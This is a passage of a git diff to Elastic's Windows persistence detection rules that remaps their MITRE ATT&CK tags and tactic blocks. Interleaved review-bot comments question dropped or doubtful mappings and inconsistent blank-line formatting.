b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
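Review bot: Removing the Execution `[[rule.threat]]` entry (T1059 Command and Scripting Interpreter with the PowerShell and Visual Basic sub-techniques) leaves a rule named `persistence_local_scheduled_task_scripting.toml` with no mapping to the scripting interpreters it is named for. The hunk header shows the query is a `sequence by host.id with maxspan = 30s`, presumably correlating the task creation with an interpreter launch (the query itself is outside the hunk, so confirm); if so, the T1059 mapping documents real coverage and its deletion lowers the rule's ATT&CK coverage with no change in what it detects. If the Execution tactic is dropped deliberately, that rationale belongs in the PR description; the removal of `"Tactic: Execution"` in the preceding tags hunk is then consistent with it.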
@@ -72,16 +72,7 @@ Audit User Account Management (Success,Failure) ``` """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -92,26 +83,26 @@ iam where host.os.type == "windows" and event.code == "4738" and winlog.event_da [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1558" -name = "Steal or Forge Kerberos Tickets" -reference = "https://attack.mitre.org/techniques/T1558/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_msi_installer_task_startup.toml b/rules/windows/persistence_msi_installer_task_startup.toml index 240595008a9..cb71605d295 100644 --- a/rules/windows/persistence_msi_installer_task_startup.toml +++ b/rules/windows/persistence_msi_installer_task_startup.toml 
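Review bot: The Credential Access entry (T1558 Steal or Forge Kerberos Tickets) is swapped for a Privilege Escalation entry that merely repeats T1098, so a rule about `msDS-AllowedToDelegateTo` being pointed at krbtgt no longer references Kerberos tickets at all. The removed `tags` list never carried `"Tactic: Credential Access"` although the `TA0006` block existed, so this looks like the tag/tactic mismatch being resolved in the lossy direction (delete the mapping) rather than by adding the missing tag. Unless Credential Access is genuinely out of scope, keep the `TA0006` block alongside the new `TA0004` one and add `"Tactic: Credential Access"` to `tags`; otherwise state the reason in the PR description.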
@@ -2,7 +2,7 @@
 creation_date = "2024/09/05"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/01"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -126,27 +126,12 @@ Windows Installer, through msiexec.exe, facilitates software installation and co
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1053"
-name = "Scheduled Task/Job"
-reference = "https://attack.mitre.org/techniques/T1053/"
-[[rule.threat.technique.subtechnique]]
-id = "T1053.005"
-name = "Scheduled Task"
-reference = "https://attack.mitre.org/techniques/T1053/005/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1218"
 name = "System Binary Proxy Execution"
 reference = "https://attack.mitre.org/techniques/T1218/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1218.007"
 name = "Msiexec"
@@ -156,3 +141,31 @@ reference = "https://attack.mitre.org/techniques/T1218/007/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1053"
+name = "Scheduled Task/Job"
+reference = "https://attack.mitre.org/techniques/T1053/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1053.005"
+name = "Scheduled Task"
+reference = "https://attack.mitre.org/techniques/T1053/005/"
+
+[[rule.threat.technique]]
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1547.001"
+name = "Registry Run Keys / Startup Folder"
+reference = "https://attack.mitre.org/techniques/T1547/001/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/windows/persistence_msoffice_startup_registry.toml b/rules/windows/persistence_msoffice_startup_registry.toml
index 6be85a0e79a..feec07ffa4f 100644
--- a/rules/windows/persistence_msoffice_startup_registry.toml
+++ b/rules/windows/persistence_msoffice_startup_registry.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/22"
 integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "windows"]
 maturity = "production"
-updated_date = "2025/08/26"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -63,20 +63,7 @@ references = [
 risk_score = 21
 rule_id = "14dab405-5dd9-450c-8106-72951af2391f"
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: SentinelOne",
- "Data Source: Crowdstrike",
- "Data Source: Sysmon",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Sysmon", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -88,31 +75,18 @@ registry where host.os.type == "windows" and event.action != "deletion" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1137"
 name = "Office Application Startup"
 reference = "https://attack.mitre.org/techniques/T1137/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1137.002"
 name = "Office Test"
 reference = "https://attack.mitre.org/techniques/T1137/002/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1112"
-name = "Modify Registry"
-reference = "https://attack.mitre.org/techniques/T1112/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/persistence_netsh_helper_dll.toml b/rules/windows/persistence_netsh_helper_dll.toml
index ea1754b7177..d74ccf6386f 100644
--- a/rules/windows/persistence_netsh_helper_dll.toml
+++ b/rules/windows/persistence_netsh_helper_dll.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/29"
 integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/08/26"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -87,31 +87,18 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1546.007"
 name = "Netsh Helper DLL"
 reference = "https://attack.mitre.org/techniques/T1546/007/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1112"
-name = "Modify Registry"
-reference = "https://attack.mitre.org/techniques/T1112/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml
index 70d8729bfdc..0f4533e272c 100644
--- a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml
+++ b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/15"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -68,21 +68,7 @@ references = [
 risk_score = 47
 rule_id = "ce64d965-6cb0-466d-b74f-8d2c76f47f05"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Execution",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Windows Security Event Logs",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Sysmon",
- "Data Source: SentinelOne",
- "Data Source: Crowdstrike",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -94,36 +80,13 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-[[rule.threat.technique.subtechnique]]
-id = "T1098.002"
-name = "Additional Email Delegate Permissions"
-reference = "https://attack.mitre.org/techniques/T1098/002/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/windows/persistence_powershell_profiles.toml b/rules/windows/persistence_powershell_profiles.toml
index 419fec79e13..78f2542e3ac 100644
--- a/rules/windows/persistence_powershell_profiles.toml
+++ b/rules/windows/persistence_powershell_profiles.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/10/13"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/08/26"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -110,20 +110,7 @@ references = [
 risk_score = 47
 rule_id = "5cf6397e-eb91-4f31-8951-9f0eaa755a31"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Privilege Escalation",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Sysmon",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: SentinelOne",
- "Data Source: Crowdstrike",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -141,36 +128,18 @@ file where host.os.type == "windows" and event.type != "deletion" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1546.013"
 name = "PowerShell Profile"
 reference = "https://attack.mitre.org/techniques/T1546/013/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
-[[rule.threat.technique.subtechnique]]
-id = "T1546.013"
-name = "PowerShell Profile"
-reference = "https://attack.mitre.org/techniques/T1546/013/"
-
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml
index 9cb6a3c5279..cc52c54c402 100644
--- a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml
+++ b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows", "m365_defender"]
 maturity = "production"
-updated_date = "2025/09/11"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
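Review bot: The second `[[rule.threat]]` block (T1546.013 under TA0004 Privilege Escalation) is deleted here, and the preceding tags hunk drops `"Tactic: Privilege Escalation"` to match, while the accessibility-features rule later in this commit keeps its T1546.008 entry under both TA0003 and TA0004. Both are sub-techniques of the same parent, so after this commit two rules in the same directory disagree on whether Event Triggered Execution maps to Privilege Escalation. If the narrowing is deliberate a sentence in the commit message would settle it; otherwise the removed block should be retained with the blank-line formatting the rest of the hunk introduces.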
@@ -106,17 +106,7 @@ references = ["https://www.elastic.co/blog/practical-security-engineering-statef
 risk_score = 73
 rule_id = "7405ddf1-6c8e-41ce-818f-48bea6bcaed8"
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Resources: Investigation Guide",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Sysmon",
- "Data Source: Microsoft Defender for Endpoint",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -154,36 +144,36 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1546.008"
 name = "Accessibility Features"
 reference = "https://attack.mitre.org/techniques/T1546/008/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1546.008"
 name = "Accessibility Features"
 reference = "https://attack.mitre.org/techniques/T1546/008/"
-
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/windows/persistence_registry_uncommon.toml b/rules/windows/persistence_registry_uncommon.toml
index 477f8078256..eb9b4bf0b71 100644
--- a/rules/windows/persistence_registry_uncommon.toml
+++ b/rules/windows/persistence_registry_uncommon.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/18"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -153,41 +153,53 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1037"
+name = "Boot or Logon Initialization Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/"
+
+[[rule.threat.technique]]
+id = "T1176"
+name = "Software Extensions"
+reference = "https://attack.mitre.org/techniques/T1176/"
+
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
 reference = "https://attack.mitre.org/techniques/T1546/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1546.002"
 name = "Screensaver"
 reference = "https://attack.mitre.org/techniques/T1546/002/"
+[[rule.threat.technique.subtechnique]]
+id = "T1546.012"
+name = "Image File Execution Options Injection"
+reference = "https://attack.mitre.org/techniques/T1546/012/"
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1547.001"
 name = "Registry Run Keys / Startup Folder"
 reference = "https://attack.mitre.org/techniques/T1547/001/"
+[[rule.threat.technique.subtechnique]]
+id = "T1547.004"
+name = "Winlogon Helper DLL"
+reference = "https://attack.mitre.org/techniques/T1547/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1547.014"
+name = "Active Setup"
+reference = "https://attack.mitre.org/techniques/T1547/014/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1112"
-name = "Modify Registry"
-reference = "https://attack.mitre.org/techniques/T1112/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
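Review bot: The three new sub-technique tables (T1546.012, T1547.004, T1547.014) are added directly after the preceding `reference = ...` line with no separator, while the same hunk inserts a `+` blank line before every other `[[rule.threat.technique]]` and `[[rule.threat.technique.subtechnique]]` table it touches, so the file ends up in two formatting styles. The same hunk-local inconsistency appears in the sdprop hunk (second T1484 block) and the service_dll_unsigned hunk (second T1543 block) later in this commit. Adding the blank line before each of these tables keeps the files consistent with the layout the commit otherwise establishes.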
diff --git a/rules/windows/persistence_remote_password_reset.toml b/rules/windows/persistence_remote_password_reset.toml
index 9bfbeba67ac..e16151644d7 100644
--- a/rules/windows/persistence_remote_password_reset.toml
+++ b/rules/windows/persistence_remote_password_reset.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/10/18"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/11/14"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -63,15 +63,7 @@ references = [
 risk_score = 47
 rule_id = "2820c9c2-bcd7-4d6e-9eba-faf3891ba450"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Impact",
- "Data Source: Windows Security Event Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
@@ -97,26 +89,26 @@ sequence by winlog.computer_name with maxspan=1m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1531"
-name = "Account Access Removal"
-reference = "https://attack.mitre.org/techniques/T1531/"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml
index 5152e42debf..fbae1bd3fd4 100644
--- a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml
+++ b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/19"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -89,19 +89,13 @@ sequence by host.id, user.name with maxspan=1m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
 reference = "https://attack.mitre.org/techniques/T1547/"
-[[rule.threat.technique.subtechnique]]
-id = "T1547.001"
-name = "Registry Run Keys / Startup Folder"
-reference = "https://attack.mitre.org/techniques/T1547/001/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
diff --git a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml
index d5fd087cd9d..d236449f23d 100644
--- a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml
+++ b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/02/24"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/11/14"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
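Review bot: The `@@ -89,19 +89,13 @@` hunk removes the T1547.001 "Registry Run Keys / Startup Folder" sub-technique and keeps only the parent T1547, for a rule whose file name says it is specifically about processes started from Run keys; the other Run-key and startup-folder rules in this commit (registry_uncommon, startup_folder_file_written_by_unsigned_process, startup_folder_scripts) keep T1547.001. Unless the intent is to report coverage at the parent only, restoring the four removed lines (`[[rule.threat.technique.subtechnique]]` through its `reference = ...`) keeps this rule as specific as its siblings. The removal is not mentioned in the commit subject, so it is hard to tell whether it was deliberate.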
@@ -79,16 +79,7 @@ Audit Directory Service Changes (Success)
 ```
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Data Source: Active Directory",
- "Resources: Investigation Guide",
- "Use Case: Active Directory Monitoring",
- "Data Source: Windows Security Event Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -102,24 +93,36 @@ any where host.os.type == "windows" and event.code == "5136" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
 [[rule.threat.technique.subtechnique]]
-id = "T1078.002"
-name = "Domain Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/002/"
+id = "T1484.001"
+name = "Group Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/001/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+[[rule.threat.technique.subtechnique]]
+id = "T1484.001"
+name = "Group Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/001/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/windows/persistence_service_dll_unsigned.toml b/rules/windows/persistence_service_dll_unsigned.toml
index cbd24408d74..10040a4d61f 100644
--- a/rules/windows/persistence_service_dll_unsigned.toml
+++ b/rules/windows/persistence_service_dll_unsigned.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/17"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
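Review bot: Both new `[[rule.threat]]` blocks map this rule to T1484.001 "Group Policy Modification", but judging from the file name the rule watches event 5136 changes to the dSHeuristics attribute, which as far as I know lives on the directory service configuration object rather than on a Group Policy object, so the sub-technique reads as a stretch even where the parent T1484 fits. Mapping to the parent only, or adding a sentence to the rule description explaining why .001 was chosen, would make the classification easier to defend. The preceding tags hunk also drops `"Tactic: Persistence"` while the file keeps its `persistence_` prefix and `rule_id`, which is worth confirming as intended since the directory name no longer reflects any mapped tactic.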
@@ -21,16 +21,7 @@ references = [
 risk_score = 47
 rule_id = "78ef0c95-9dc2-40ac-a8da-5deb6293a14e"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Defense Evasion",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -167,53 +158,36 @@ Svchost.exe is a critical Windows process that hosts multiple services, allowing
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1543.003"
 name = "Windows Service"
 reference = "https://attack.mitre.org/techniques/T1543/003/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-[[rule.threat.technique.subtechnique]]
-id = "T1036.001"
-name = "Invalid Code Signature"
-reference = "https://attack.mitre.org/techniques/T1036/001/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1569"
-name = "System Services"
-reference = "https://attack.mitre.org/techniques/T1569/"
-[[rule.threat.technique.subtechnique]]
-id = "T1569.002"
-name = "Service Execution"
-reference = "https://attack.mitre.org/techniques/T1569/002/"
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+[[rule.threat.technique.subtechnique]]
+id = "T1543.003"
+name = "Windows Service"
+reference = "https://attack.mitre.org/techniques/T1543/003/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/windows/persistence_service_windows_service_winlog.toml b/rules/windows/persistence_service_windows_service_winlog.toml
index 99867689123..587b3378aff 100644
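Review bot: This hunk deletes the T1036.001 "Invalid Code Signature" / TA0005 block from a rule whose file name says it fires on an unsigned service DLL, so the one technique describing the rule's discriminating condition is gone and only Persistence and Privilege Escalation remain (the tags hunk above drops `"Tactic: Defense Evasion"` to match). The same removal is made in the startup_folder_file_written_by_unsigned_process hunk later in the commit. If the policy is to map only the primary behaviour of each rule, a sentence saying so in the commit message would help future readers; otherwise I would keep the T1036.001 block under TA0005 alongside the new TA0004 block, formatted with the blank-line separators this hunk introduces elsewhere.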
--- a/rules/windows/persistence_service_windows_service_winlog.toml
+++ b/rules/windows/persistence_service_windows_service_winlog.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/08/30"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/12/11"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -97,15 +97,7 @@ This rule looks for suspicious services being created with suspicious traits com
 risk_score = 47
